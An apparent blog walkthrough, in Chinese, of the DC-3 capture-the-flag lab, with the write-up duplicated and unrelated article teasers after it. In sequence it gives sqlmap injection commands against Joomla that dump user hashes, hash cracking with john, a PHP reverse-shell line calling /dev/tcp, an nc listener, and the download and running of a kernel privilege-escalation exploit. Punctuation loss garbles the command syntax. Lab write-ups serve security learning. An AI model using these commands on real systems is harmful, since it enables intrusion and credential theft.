信息搜集阶段发现该网站的cms为joomlajoomscan --url url利用joomla专门的扫描器扫描得到版本此版本存在高危sql注入漏洞(CVE-8917)渗透阶段直接用sqlmap跑一下对应expsqlmap -u http://ip/index.php?optioncom_fieldsviewfieldslayoutmodallist[fullordering]updatexml --dbs --batchsqlmap -u http://ip/index.php?optioncom_fieldsviewfieldslayoutmodallist[fullordering]updatexml -D --tables --batchsqlmap -u http://192.168.129.136/index.php?optioncom_fieldsviewfieldslayoutmodallist[fullordering]updatexml -D joomladb -T #__users -C username,password --dump --batch获取用户名密码哈希$2y开头对应Bcrypt算法由于其不可逆性只能转换hash值去猜弱口令john hash.txt --wordlist/usr/share/wordlists/rockyou.txt使用john工具破解一下输入账密后进入后台需要我们拿webshell利用模板代码执行进入template页面选择或者新建一个文件写入反弹shell?php system(bash -c bash -i /dev/tcp/ip/监听端口 01);?nc -nvlp 4444开启监听访问刚刚的文件http://目标ip/templates/protostar/error.php后渗透阶段拿到shell后uname -a查看一下目标的内核4.4.0同时i686代表是x86此版本存在CVE-2016-4557提权漏洞本机searchsploit ubuntu 4.4.0选择local privilege32位的searchsploit -m 44298下载到当前目录下python3 -m http.server 8080开启web服务方便目标下载切回目标wget http://本机ip:端口/44298.cgcc 44298.c -o exploit编译此程序chmod x exploit赋权./exploit此处我做的时候是失败了查阅资料发现对应编号是39772
DC3靶场攻略
发布时间:2026/5/21 18:46:02
信息搜集阶段发现该网站的cms为joomlajoomscan --url url利用joomla专门的扫描器扫描得到版本此版本存在高危sql注入漏洞(CVE-8917)渗透阶段直接用sqlmap跑一下对应expsqlmap -u http://ip/index.php?optioncom_fieldsviewfieldslayoutmodallist[fullordering]updatexml --dbs --batchsqlmap -u http://ip/index.php?optioncom_fieldsviewfieldslayoutmodallist[fullordering]updatexml -D --tables --batchsqlmap -u http://192.168.129.136/index.php?optioncom_fieldsviewfieldslayoutmodallist[fullordering]updatexml -D joomladb -T #__users -C username,password --dump --batch获取用户名密码哈希$2y开头对应Bcrypt算法由于其不可逆性只能转换hash值去猜弱口令john hash.txt --wordlist/usr/share/wordlists/rockyou.txt使用john工具破解一下输入账密后进入后台需要我们拿webshell利用模板代码执行进入template页面选择或者新建一个文件写入反弹shell?php system(bash -c bash -i /dev/tcp/ip/监听端口 01);?nc -nvlp 4444开启监听访问刚刚的文件http://目标ip/templates/protostar/error.php后渗透阶段拿到shell后uname -a查看一下目标的内核4.4.0同时i686代表是x86此版本存在CVE-2016-4557提权漏洞本机searchsploit ubuntu 4.4.0选择local privilege32位的searchsploit -m 44298下载到当前目录下python3 -m http.server 8080开启web服务方便目标下载切回目标wget http://本机ip:端口/44298.cgcc 44298.c -o exploit编译此程序chmod x exploit赋权./exploit此处我做的时候是失败了查阅资料发现对应编号是39772
相关文章
《C语言程序设计(第3版)》课后答案.pdf
说明:所有答案均在VC6.0环境下调试运行通过项目一 参考答案 一、单项选择题1.C 2.D 3.C 4.C 5.A 6.C 二、填空题1. main2. .c3. 编译或汇编4. 录入并编辑5. 语法、逻辑 三、应用题 1. C语言的主要特点如下:(1)C语言上一种模块化的…
【Midjourney蒸汽波风格创作指南】:20年AI视觉设计专家亲授7大核心参数调优公式与色彩失控修复术
更多请点击: https://kaifayun.com 第一章:蒸汽波美学的AI视觉解构与历史基因 蒸汽波(Vaporwave)并非单纯的艺术风格,而是一场以数字怀旧为语法、以技术异化为潜台词的视觉考古运动。其视觉基因可追溯至1980年代日本城…
智慧树刷课插件完整指南:如何5分钟实现视频自动播放与高效学习
智慧树刷课插件完整指南:如何5分钟实现视频自动播放与高效学习 【免费下载链接】zhihuishu 智慧树刷课插件,自动播放下一集、1.5倍速度、无声 项目地址: https://gitcode.com/gh_mirrors/zh/zhihuishu 还在为智慧树平台枯燥的重复点击而烦恼吗&am…
Buzz音频转录终极指南:3步掌握本地AI转录的完整技巧
Buzz音频转录终极指南:3步掌握本地AI转录的完整技巧 【免费下载链接】buzz Buzz transcribes and translates audio offline on your personal computer. Powered by OpenAIs Whisper. 项目地址: https://gitcode.com/GitHub_Trending/buz/buzz 你是否曾为会…
从英文界面到母语设计:Figma中文翻译插件如何重塑你的创作流程
从英文界面到母语设计:Figma中文翻译插件如何重塑你的创作流程 【免费下载链接】figmaCN 中文 Figma 插件,设计师人工翻译校验 项目地址: https://gitcode.com/gh_mirrors/fi/figmaCN 想象一下,当你打开Figma准备开始新项目时…
UndertaleModTool新手入门:从零开始制作你的第一个游戏模组
UndertaleModTool新手入门:从零开始制作你的第一个游戏模组 【免费下载链接】UndertaleModTool The most complete tool for modding, decompiling and unpacking Undertale (and other GameMaker games!) 项目地址: https://gitcode.com/gh_mirrors/un/Undertale…
【Typescript】07-泛型入门与实战
泛型入门与实战 很多人第一次看到泛型,都会觉得它有点抽象。代码里突然多出一个 T、K、V,好像进入了另一个层级。其实泛型的本质非常朴素:让类型也能像函数参数一样被传入。 如果说前面的类型声明解决的是“这个东西是什么”,那么…
CANN 模型转换与适配:从 PyTorch 到 Ascend OM 的完整指南
模型转换是昇腾落地的第一道坎。不管你用 PyTorch、TensorFlow 还是 MindSpore,最终都要变成 Ascend 的 .om 模型才能在 NPU 上跑。 这篇文章讲清楚:模型转换的完整流程、常见问题和优化技巧。 为什么需要模型转换? 昇腾 NPU 不能直接运行 Py…
3分钟快速找回Chrome密码:免费开源工具终极指南
3分钟快速找回Chrome密码:免费开源工具终极指南 【免费下载链接】chromepass Get all passwords stored by Chrome on WINDOWS. 项目地址: https://gitcode.com/gh_mirrors/chr/chromepass 忘记Chrome保存的密码?别担心,ChromePass这款…
别只刷固件了!用MissionPlanner搞定四旋翼‘飘移’问题,校准compass_mot全流程
四旋翼飞行品质优化:MissionPlanner高级校准实战指南 当你的四旋翼无人机已经能够稳定起飞,却在定高模式下出现难以解释的飘移现象时,这往往意味着需要进入更深层次的飞控调校阶段。许多飞手在完成基础校准后便止步不前,殊不知电机…
科研学术篇---论文搜索方法
高效搜集和研读论文,是构建扎实知识体系的基石。要想做到“高效”与“高质”并重,需要把整个过程当作一个闭环系统来优化——从目标锁定、来源筛选、检索策略,到快速粗筛、深度内化、持续追踪,每一步都有对应的工具和心法。下面逐…
YOLOv11城市道路摩托车与自行车目标检测数据集-1569张-motorcycle-1_2
YOLOv11城市道路摩托车与自行车目标检测数据集 📊 数据集基本信息 目标类别: [‘bike’, ‘motorcycle’]中文类别:[‘自行车’, ‘摩托车’]训练集:1374 张验证集:130 张测试集:65 张总计:1569…
【实用小程序】超轻量级文件上传下载中心 (File Download Server)
站内源码及jar包下载 一、项目概述 文件下载中心一个基于 Java 内置 HTTP 服务器(com.sun.net.httpserver)构建的轻量级文件管理服务。它零第三方依赖,单 JAR 包即可运行,适合在内网环境或临时场景中快速搭建文件共享站点。 你的团队需要临时共享一批日志文件或交付物,…
py每日spider案例之某website之xin东方选课搜索接口(难度一般 扣取代码即可)
加密位置: 逆向接口参数: 逆向接口: const g = globalThis; g.window = g; g.self = g; g.location = {<
终极轻量级Android文本编辑器Markor:多格式笔记应用完全指南
终极轻量级Android文本编辑器Markor:多格式笔记应用完全指南 【免费下载链接】markor Text editor - Notes & ToDo (for Android) - Markdown, todo.txt, plaintext, math, .. 项目地址: https://gitcode.com/gh_mirrors/ma/markor 在移动设备上寻找一款…
MPC-BE:基于DirectShow架构的专业级开源媒体播放解决方案
MPC-BE:基于DirectShow架构的专业级开源媒体播放解决方案 【免费下载链接】MPC-BE MPC-BE – универсальный проигрыватель аудио и видеофайлов для операционной системы Windows. 项目地址:…
如何快速计算3D模型体积和重量:STL-Volume-Model-Calculator终极指南
如何快速计算3D模型体积和重量:STL-Volume-Model-Calculator终极指南 【免费下载链接】STL-Volume-Model-Calculator STL Volume Model Calculator Python 项目地址: https://gitcode.com/gh_mirrors/st/STL-Volume-Model-Calculator 你是否曾经为3D打印项目…
通过Taotoken CLI工具一键配置团队开发环境与模型密钥
通过Taotoken CLI工具一键配置团队开发环境与模型密钥 1. CLI工具安装与基本使用 Taotoken提供的CLI工具可通过npm全局安装或直接使用npx运行。对于需要频繁使用CLI的团队,推荐全局安装: npm install -g taotoken/taotoken对于临时使用或项目级配置&a…